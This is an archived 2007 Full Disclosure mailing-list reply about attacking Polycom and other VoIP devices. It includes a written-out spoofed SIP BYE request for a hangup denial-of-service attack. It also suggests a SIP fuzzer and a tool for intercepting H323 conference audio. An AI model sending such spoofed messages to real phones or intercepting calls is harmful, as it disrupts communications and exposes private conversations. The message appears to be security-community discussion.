Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Polycom hacking
From: "J. Oquendo" <sil () infiltrated net>
Date: Tue, 26 Jun 2007 14:15:51 -0400

Paul Schmehl wrote:
Is anyone aware of any work done in the field of hacking Polycom video-conferencing devices? Or any known hacks for Polycom devices?

Hey Paul,

I have a modified version of Asteroid lying on one of my
servers that affected Polycoms, Snoms, Hitachi WiFi's,
and possibly a few others.

Offhand you could with high probability generate a hangup
DoS if you know enough about the network topology. E.g.:

  BYE sip:victim.phone.com SIP/2.0
  Via: SIP/2.0/TCP spoofed.pbx.server.com:5060
  Max-Forwards: 70
  From: Spoofed <sip:spoofed.pbx.server.com>
  To: VICTIM <sip:victim () victim phone com>
  Call-ID: $GENERATE_CID_NUMBER () victim phone com
  CSeq: 1 BYE
  Content-Length: 0

You could take a look at Asteroid and target a Polycom
with it. I haven't bothered much with them. Cisco's
aren't vuln to much I've thrown at them yet.
(greetings Dario () ^C*).

As for video (H323) check out voippong: You may be able
to intercept the audio streams out of the conference
depending on the setup. (Asterisk doesn't do H323)...
Maybe a combination of Yates, VoIPPong and others. HTH


J. Oquendo
echo infiltrated.net|sed 's/^/sil@/g'
"Wise men talk because they have something to say;
fools, because they have to say something." -- Plato

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]